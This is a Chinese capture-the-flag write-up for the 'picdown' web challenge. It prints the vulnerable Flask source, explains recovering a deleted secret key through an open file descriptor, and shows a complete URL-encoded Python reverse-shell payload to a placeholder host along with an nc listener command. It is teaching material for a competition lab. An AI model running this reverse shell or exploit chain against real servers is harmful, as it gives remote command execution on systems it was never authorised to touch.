【网鼎杯2020白虎组】Web WriteUp [picdown]

picdown

抓包发现存在文件包含漏洞：

 

在main.py下面暴露的flask的源代码 

 

from flask import Flask, Response, render_template, request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE, 'r')
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)


@app.route('/')
def index():
    return render_template('search.html')


@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except Exception as e:
        print(e)
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)


@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80, use_reloader=False)

代码审计发现，no_one_know_the_manager页面下接收key和shell，key要求和secret_key一样。

但是secret.txt读不了

 

但是这个文件是用open打开的，会创建文件描述符。我们读这个文件描述符中的内容就好了

 

找到了key=2e3658a3c99be231c2b3b0cc260528c4

现在可以执行系统命令了

 

但是不会回显，要反弹shell了。

 python脚本反弹shell

/no_one_know_the_manager?key=2e3658a3c99be231c2b3b0cc260528c4&shell=python%20-c%20%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22xx.xx.xx.xx%22,8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27

服务器：nc -lvvp 8080

可以成功反弹shell,最终在/root/flag.txt中得到flag:

 

 

其他web题目，ctf平台没有上环境...

待续....